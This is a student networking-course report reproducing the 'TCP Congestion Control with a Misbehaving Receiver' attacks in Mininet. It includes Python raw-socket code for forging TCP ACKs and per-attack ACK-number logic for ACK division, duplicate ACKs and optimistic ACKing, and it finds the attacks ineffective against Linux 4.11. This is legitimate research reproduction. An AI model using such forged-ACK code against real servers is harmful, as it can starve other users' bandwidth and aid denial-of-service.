CS244 ’17: TCP Congestion Control with a Misbehaving Receiver


Alex Sosa and Hemanth Kini

Introduction

The paper we chose was TCP Congestion Control with a Misbehaving Receiver by Savage et al. In short, the paper shows that certain features designed into TCP to preserve high throughput in the face of congestion can be exploited by a malicious receiver to circumvent TCP congestion control and cause the sender to transmit large bursts of packets. This technique would allow a malicious user to download data from a website at a rate much higher than normal. The authors described three such attacks and evaluated their efficacy against various kernels of the time. We reproduce each attack against the most common kernel used in web servers today and report our results.

Goals of the Paper

The paper states, “We first demonstrate that there are simple attacks that allow a misbehaving receiver to drive a standard TCP sender arbitrarily fast, without losing end-to-end reliability. These attacks are widely applicable because they stem from the sender behavior specified in RFC 2581 rather than implementation bugs. We then show that it is possible to modify TCP to eliminate this undesirable behavior entirely, without requiring assumptions of any kind about receiver behavior.” [0] It describes three main attacks that a misbehaving TCP receiver could execute against the sender. Each exploits a slightly different characteristic of the sender behavior detailed in RFC 2581: byte-level ACK granularity (ACK division), duplicate ACKs, and optimistic ACKing. After demonstrating the feasibility of the attacks, the authors devised a solution for each one.

Motivation of Paper

This problem is particularly important because TCP remains one of the primary protocols for data transfer over the web today. A misbehaving receiver can therefore manipulate the sender into sending it a large number of packets, possibly harming the connections of other receivers or network users. In addition, later related research [1] describes how a group of misbehaving receivers can be used in tandem to cause congestion collapse and/or execute a distributed denial of service (DDoS) attack against a host.

Paper Results

The authors found that all three attacks were feasible on the majority of operating system kernels at the time. They demonstrated the real-world results of running each of the three attacks against cnn.com. Each result is shown below.

[Figure 4 from the paper: ACK division attack against cnn.com]

[Figure 5 from the paper: DupACK spoofing attack against cnn.com]

[Figure 6 from the paper: optimistic ACKing attack against cnn.com]

They found that, at the time of writing, Linux 2.2 was immune to ACK-division-based attacks. However, Linux 2.2 was susceptible to the duplicate-ACK-based and optimistic-ACK-based attacks. (This is of note because we will be attempting to replicate these results on Linux.)

 

Subset Goal and Motivation

Our goal is to reproduce figures 4, 5, and 6 of the paper, as shown above. We chose to reproduce these specific results because they clearly demonstrate whether each attack is still feasible – whether it can achieve a quick burst of packets in the way that the authors describe. Our aim is to see a clear difference in arrival rate with and without a malicious receiver, as this shows the impact of the attacks.

 

Methodology

In order to modify the behavior of a TCP receiver, we could not rely on Python's standard TCP socket stack. To be able to acknowledge packets in a user-controllable manner, we needed to use raw sockets in Python to get complete access to the TCP headers. Raw sockets allow direct modification of IP and TCP headers, with the caveat that one is left to deal with every minute detail of header construction and parts of the TCP stack, such as handling the three-way handshake. We abstracted this difficulty into a raw socket API that let us set just the specific IP and TCP header fields we needed to change.
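Our raw-socket helper is not reproduced here, but its core is a handful of struct.pack calls plus the TCP checksum computed over the IPv4 pseudo-header. A minimal sketch of that idea (the addresses, ports, and sequence numbers below are placeholders, and this is not our exact API) looks roughly like the following; it must be run as root, since raw sockets require elevated privileges.

import socket
import struct

def tcp_checksum(src_ip, dst_ip, tcp_segment):
    # RFC 793 checksum over the IPv4 pseudo-header plus the TCP segment.
    pseudo = struct.pack('!4s4sBBH',
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(tcp_segment))
    data = pseudo + tcp_segment
    if len(data) % 2:                      # pad to an even number of bytes
        data += b'\x00'
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) + data[i + 1]
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    return ~total & 0xffff

def build_ack(src_ip, dst_ip, src_port, dst_port, seq, ack, window=65535):
    # Build a bare ACK segment: no options, no payload.
    offset_flags = (5 << 12) | 0x10        # data offset = 5 words, ACK flag set
    header = struct.pack('!HHIIHHHH', src_port, dst_port, seq, ack,
                         offset_flags, window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header)
    return header[:16] + struct.pack('!H', csum) + header[18:]

# The kernel fills in the IP header for us (IP_HDRINCL is not set here).
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
segment = build_ack('10.0.0.2', '10.0.0.1', 54321, 80, seq=1, ack=1001)
sock.sendto(segment, ('10.0.0.1', 0))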

To implement these exploits, we used our IP and TCP header construction API for raw sockets to first initiate a connection with the server using a three-way handshake and then send a GET request. The server (a basic Python HTTP server) would respond to this GET request by sending a 100 KB file over the TCP connection for our client to download. On the client side, we would receive each packet individually through the raw socket recv() interface and then determine the acknowledgement numbers of the ACK packets to send back to the server based on each exploit. For our non-malicious receiver (the control in our experiment), we would simply ACK the next expected sequence number, as a normal TCP receiver would. For the byte-wise ACK exploit, we send ACKs at several intermediate points between the received sequence number and the next expected sequence number. For the duplicate ACK exploit, we send multiple ACKs carrying the next expected sequence number. Finally, for the optimistic ACK exploit, we send an ACK for the next expected sequence number plus several ACKs with higher sequence numbers.
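To make the per-exploit logic concrete, the ACK numbers generated for one received data segment can be written as a small pure function. This is an illustrative sketch rather than our exact tuning; the number of extra ACKs and the assumed MSS are placeholders.

def acks_to_send(exploit, last_seq, payload_len, num_acks=3, mss=1460):
    # Return the list of ACK numbers to send for one received data segment.
    # last_seq is the sequence number of the first payload byte received;
    # payload_len is the number of payload bytes in that segment.
    next_expected = last_seq + payload_len

    if exploit == 'control':
        # Well-behaved receiver: a single cumulative ACK.
        return [next_expected]
    if exploit == 'byte_wise':
        # ACK division: acknowledge the segment in several sub-segment pieces.
        step = max(1, payload_len // num_acks)
        return list(range(last_seq + step, next_expected, step)) + [next_expected]
    if exploit == 'dup_ack':
        # Duplicate ACKs: repeat the same cumulative ACK several times.
        return [next_expected] * num_acks
    if exploit == 'optimistic':
        # Optimistic ACKs: acknowledge data that has not arrived yet.
        return [next_expected + i * mss for i in range(num_acks + 1)]
    raise ValueError('unknown exploit: %s' % exploit)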

For each exploit, we had to experiment with the number and values of the ACKs we sent. Early in experimentation, it was clear that sending a very large number of ACKs throttled the throughput of the connection. For example, sending an ACK for every byte of the received packet caused the download rate to drop dramatically, as all the time was spent sending and handling ACKs rather than expanding the sending window as the exploit aims to do. By varying the number of ACKs sent, we found that erring on the side of sending fewer ACK packets increased throughput.

To measure the arrival times of packets, we used the output of tcpdump to track when each sequence number arrived relative to when the initial request was sent to the server. This was packaged into its own Python script and run on the client in the background while the exploited requests were being sent. We then plotted the results with a third script to generate graphs similar to those in the paper.
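The measurement step amounts to parsing tcpdump's text output. A rough sketch of that parsing, assuming a capture produced with tcpdump -tt -n and measuring time relative to the first packet seen from the server rather than to the request itself, is below; the regular expression is an approximation of tcpdump's line format, not our exact script.

import re

# Matches lines such as:
# 1495000000.123456 IP 10.0.0.1.80 > 10.0.0.2.54321: Flags [.], seq 1:1449, ack 1, ...
LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) IP .* seq (?P<seq>\d+)(?::\d+)?,')

def arrival_times(dump_path, server_port=80):
    # Return (seconds_since_first_server_packet, sequence_number) pairs.
    points, t0 = [], None
    with open(dump_path) as f:
        for line in f:
            if '.%d >' % server_port not in line:   # keep only packets sent by the server
                continue
            m = LINE_RE.match(line)
            if not m:
                continue
            ts, seq = float(m.group('ts')), int(m.group('seq'))
            if t0 is None:
                t0 = ts
            points.append((ts - t0, seq))
    return points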

 

Subset Results

For each of our exploits, we were able to implement the receiver-side behavior we set out to mimic from the paper. By debugging in Wireshark, we could confirm that ACK packets in exactly the format we expected were sent by our client and received without issue by the server.

First, as some of the previous years’ reports have also found, the optimistic ACK exploit does not seem to work in current implementations of TCP. By sending ACKs for packets that have not yet been sent, the download of the webpage actually occurs at a slower rate, as shown in FIGURE 1. We suspect this is because the Linux kernel now ignores ACKs for data that has not been sent (in kernel 4.11.3, net/ipv4/tcp_input.c, line 3575). However, we had trouble identifying more complex defenses that would prevent optimistic ACKing of packets sent less than an RTT ago.

The duplicate ACK and byte-by-byte ACK exploits also seem to no longer function in the current version of the Linux kernel, as shown by FIGURES 2 and 3.

[Figure 1: optimistic ACK exploit vs. an unmodified receiver]

[Figure 2: duplicate ACK exploit vs. an unmodified receiver]

[Figure 3: byte-by-byte ACK exploit vs. an unmodified receiver]

In order to achieve the behavior displayed in the paper, we tried a variety of different techniques. We randomly dropped packets at the receiver to simulate a congested link, but found that this only made the exploits perform worse. Perhaps this is because the extra duplicate ACKs it caused, on top of the ones generated by the exploit, introduced too much variability in the receive window, or because the TCP stack cuts its send rate when it sees many duplicate ACKs. We also tried having the receiver sleep for long enough to trigger a hard timeout and a window reset on the sender side. However, this did not seem to be effective: we saw no tangible decrease in the sender’s window even after forcing the timeout, and the exploits still exactly mirrored the performance of the unmodified TCP receiver. We question why the sending window was so difficult to push back to the slow-start state, but lack the experience with the Linux kernel to figure out what has changed since the TCP Daytona paper. Finally, increasing the delay on the link or only occasionally sending the additional ACK packets also had no noticeable effect on the performance of the exploits compared to the non-malicious receiver.
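These variations amount to small perturbations of the receive loop. A rough sketch, with purely illustrative probabilities and sleep durations, is:

import random
import time

def maybe_perturb(ack_numbers, drop_prob=0.05, extra_ack_prob=0.5, force_timeout=False):
    # Apply the perturbations described above to one batch of outgoing ACKs.
    if random.random() < drop_prob:
        return []                  # pretend the data segment was lost: ACK nothing
    if force_timeout:
        time.sleep(1.0)            # stall long enough to provoke an RTO at the sender
    if random.random() > extra_ack_prob:
        return ack_numbers[:1]     # only occasionally send the extra exploit ACKs
    return ack_numbers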

These results are not completely surprising, as kernel implementations have had 18 years to fix these relatively simple vulnerabilities. Looking through the code of Linux kernel 4.11.3, it appears that the byte-by-byte ACK exploit is avoided by using the absolute sequence number of the received ACK in the receive window update, rather than updating by a fixed amount for each received packet (tcp_input.c, lines 3359 and 3361). Despite receiving additional byte-wise ACK packets or duplicate ACKs, the sender does not grow the send window any faster than it would for a single ACK.

 

Challenges: What challenges did you face in implementation?

Working with raw sockets presents a wide array of challenges. Making sure that each header field is in the correct place, has a valid value, and is stored with the correct endianness takes diligence. There are also esoteric socket flags that need to be set to make the desired functionality possible, and support for these issues in online forums is relatively thin, since few people use raw Python sockets in real software. Wireshark was an invaluable tool for examining the packets we were constructing and comparing them against valid TCP streams so that we could successfully download data via HTTP requests. We also faced challenges trying to read through the Linux kernel to determine where these vulnerabilities had been patched, as the TCP codebase is a poorly commented monolith. We were able to track down some leads about ACK handling and window size, but could not find explanations for all the cases we sought.

In addition, Mininet gave us some issues. We chose to run our experiments on Ubuntu 16.04 LTS, but did not realize that the build instructions on the Mininet website were for an older version of Ubuntu, and we ran into RTNETLINK errors while running Mininet. Checking out the latest version of the repository and rebuilding fixed this. Occasionally, Mininet would also hang on startup; restarting fixed this as well.

Critique: Critique on the main thesis that you decided to explore – does the thesis hold well, has it become outdated, or does it depend on specific assumptions not elucidated in the original paper?

It is highly plausible, based on the specifications of TCP and the codebase of the Linux kernel, that the attacks worked when the paper was written but have since been patched by kernel developers.

 

Extensions: Any exploration outside the results in the paper?

Due to lack of time, we weren’t able to explore any of the other results, but we would love to revisit them in the future. Implementing an optimistic-ack defense would be one possibility. Also, it would be interesting to see if other protocols, such as QUIC, were vulnerable to these sorts of attacks.

Platform: Choice of your platform – why that particular choice, and how reproducible is the entire setup, what parameters of the setup you think will affect the reproducibility the most?

We chose to reproduce these results on Linux, as it is the most commonly used operating system kernel for running web servers at the time of writing (36.8% on 15 May 2017, according to [2][3]). We think the setup is fairly reproducible – Mininet runs on many different Linux flavors. The parameters that probably affect reproducibility the most are the Mininet parameters (delay, bandwidth, and link topology) and CPU speed (to handle network interrupts as quickly as possible).
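For reference, the kind of topology we mean is a single shaped link between a server host and a (possibly misbehaving) client host. The sketch below uses placeholder bandwidth and delay values and a stock Python HTTP server as a stand-in for our own scripts; it is not our exact experiment harness and must be run as root.

from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink

class TwoHostTopo(Topo):
    # One server, one (possibly misbehaving) client, one shaped link.
    def build(self, bw=10, delay='20ms'):
        server = self.addHost('h1')
        client = self.addHost('h2')
        self.addLink(server, client, bw=bw, delay=delay)

if __name__ == '__main__':
    net = Mininet(topo=TwoHostTopo(), link=TCLink)
    net.start()
    h1, h2 = net.get('h1', 'h2')
    h1.cmd('python -m SimpleHTTPServer 80 &')   # stand-in for our server script
    print(h2.cmd('ping -c 3 %s' % h1.IP()))     # sanity-check the shaped link
    net.stop()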

README: Instructions on setting up and running the experiment.

Spawn a Google Compute Engine instance running Ubuntu 16.04 LTS. We recommend the defaults of 1 vCPU, 3.75 GB of RAM, and a 10 GB disk.

Clone our repository, running our installation and test runner script:

$ git clone https://bitbucket.org/aasosaa/cs244_sosakini_tcpdaytona.git

$ cd cs244_sosakini_tcpdaytona/

$ sudo bash installAndRun.sh

Our output graphs are in the same folder (cs244_sosakini_tcpdaytona/) – they’re named:
dupAcks_plot.png
byteAcks_plot.png
optAcks_plot.png


To get them to your local machine, where you can view them, we recommend using the gcloud command-line tool. Then you can simply copy the files off of the instance and onto your machine. An example follows (run this on your local machine):
$ gcloud compute copy-files instance-1:/home/hemanth_kini/cs244_sosakini_tcpdaytona/dupAcks_plot.png dupAcks_plot.png

(this example assumes that the instance is named instance-1, the user directory is named hemanth_kini, and the plot being copied is dupAcks_plot.png. Modify accordingly as needed.)


For more information on using gcloud, visit http://bit.ly/2qHWtwG
One caveat – if you’re setting up gcloud on your machine for the first time, do yourself a favor and, while configuring Google Compute Engine, set the default region to the same one your running instance is in. This lets gcloud default to that region when searching for an instance to copy from/to.

 

If you’d like to mess around with our code, look at the README.md inside cs244_sosakini_tcpdaytona/

 

Thanks!

[0]: http://cseweb.ucsd.edu/~savage/papers/CCR99.pdf

[1]: http://www.cs.umd.edu/~capveg/optack/optack-ccs05.pdf

[2]: https://w3techs.com/technologies/overview/operating_system/all

[3]: https://w3techs.com/technologies/details/os-unix/all/all


One response to “CS244 ’17: TCP Congestion Control with a Misbehaving Receiver”

  1. Evaluation results:

    The script was easy to set up on a GCE instance (with Ubuntu 16.04 LTS) using the reproduction instructions. The script ran to completion quickly. I generated and copied the following graphs using the instructions:



    Overall the byteAcks and optAcks plots line up with the reported graphs very well. The dupAcks graph shows some slight variations: the sequence numbers are slightly different for t > 1.3, and there is an extra line for t = 1.5. Perhaps this could be related to a kernel or timing difference.

    In general, I would say 5/5 for reproducibility because the script ran cleanly and the graphs line up pretty well.

    Overall, the report seems quite thorough and the authors seemed to have done a comprehensive job of understanding the original paper and re-creating it via a Mininet simulation.
